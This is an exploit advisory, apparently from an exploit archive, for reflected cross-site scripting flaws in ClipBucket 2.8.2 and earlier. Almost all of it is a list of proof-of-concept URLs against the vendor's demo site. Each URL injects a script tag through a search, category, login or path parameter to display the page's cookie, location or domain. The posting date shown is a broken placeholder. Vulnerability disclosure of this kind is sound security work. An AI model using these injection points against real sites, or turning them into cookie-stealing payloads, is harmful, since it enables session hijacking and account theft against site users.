ClipBucket 2.8.2 Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>ClipBucket 2.8.2 Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: ClipBucket <= Multiple Cross-Site Scripting Vulnerabilities # Google Dork: n/a # Date: March 20 2017 # Exploit Author: NoGe # Vendor Homepage: https://clipbucket.com/ # Download: https://github.com/arslancb/clipbucket/archive/4476.zip # Version: 2.8.2, 2.8.1 and below # Tested on: Kali Linux # Proof of Concept (Demo Site) https://demo.clipbucket.com/signup.php?mode=login </script>"><script>prompt(document.cookie)</script> https://demo.clipbucket.com /search_result.php?query=NoGe&type=videos</script>"><script>prompt(document.location)</script> https://demo.clipbucket.com /collections.php?cat=all</script>"><script>prompt(document.domain)</script>&sort=view_all&time=all_time&page=1&seo_cat_name=All&sorting=sort https://demo.clipbucket.com /collections.php?cat=all&sort=view_all&time=all_time&page=1&seo_cat_name=All</script>"><script>prompt(document.cookie)</script>&sorting=sort https://demo.clipbucket.com /photos.php?cat=all</script>"><script>prompt(document.location)</script>&sort=view_all&time=all_time&page=1&seo_cat_name=All&sorting=sort https://demo.clipbucket.com /photos.php?cat=all&sort=view_all&time=all_time&page=1&seo_cat_name=All</script>"><script>prompt(document.domain)</script>&sorting=sort https://demo.clipbucket.com /channels/all/All/view_all</script>"><script>prompt(document.cookie)</script>/all_time/1&sorting=sort/ https://demo.clipbucket.com /collections/all/All/most_recent</script>"><script>prompt(document.domain)</script>/all_time/1&timing=time/ Regards. -- NoGe </BODY></HTML>